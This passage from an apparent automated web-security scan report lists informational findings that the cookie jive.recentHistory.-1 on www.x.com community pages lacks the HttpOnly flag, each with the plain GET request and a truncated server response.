GET /community/ppx/xspaces/forums HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=123822 t=1313157052865732
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.70. https://www.x.com/community/ppx/xspaces/gaming

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/gaming HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=82477 t=1313157046859519
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.71. https://www.x.com/community/ppx/xspaces/identity

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/identity HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=98694 t=1313157041495583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.72. https://www.x.com/community/ppx/xspaces/innovate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/innovate HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=172927 t=1313157048855371
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.73. https://www.x.com/community/ppx/xspaces/introduce

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.74. https://www.x.com/community/ppx/xspaces/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323030393b31342c323030333b31342c323031313b31342c323030373b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:35 GMT; Path=/
Vary: User-Agent
JP: D=93891 t=1313157035030578
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mecl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mecl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=118072 t=1313157044365221
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mobile_ec

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mobile_ec HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=244511 t=1313157043858374
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.77. https://www.x.com/community/ppx/xspaces/security

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/security HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:55 GMT; Path=/
Vary: User-Agent
JP: D=117938 t=1313157055856107
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.78. https://www.x.com/community/ppx/xspaces/social

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/social HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=146095 t=1313157047611313
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.79. https://www.x.com/community/ppx/xspaces/subscriptions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/subscriptions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323130303b31342c323036333b31342c323038343b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=123225 t=1313157053998686
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.80. https://www.x.com/community/ppx/xspaces/toolkits

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/toolkits

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/toolkits HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323235313b31342c323232313b31342c323038343b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=92295 t=1313157054626427
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.81. https://www.x.com/community/ppx/xspaces/web_checkout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=247512 t=1313157042801714
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/nvp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=141801 t=1313157044894483
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/soap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/soap HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036313b31342c323035373b31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=130212 t=1313157046417943
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.84. https://www.x.com/community/xcommerce-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c353939353b33382c363039373b33382c363233383b33382c363238353b33382c363030363b33382c363133383b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:28 GMT; Path=/
Vary: User-Agent
JP: D=114399 t=1313157088244606
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363030363b33382c363233383b33382c363039373b33382c363133383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=132206 t=1313157087884897
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363039373b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=143677 t=1313157087084685
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

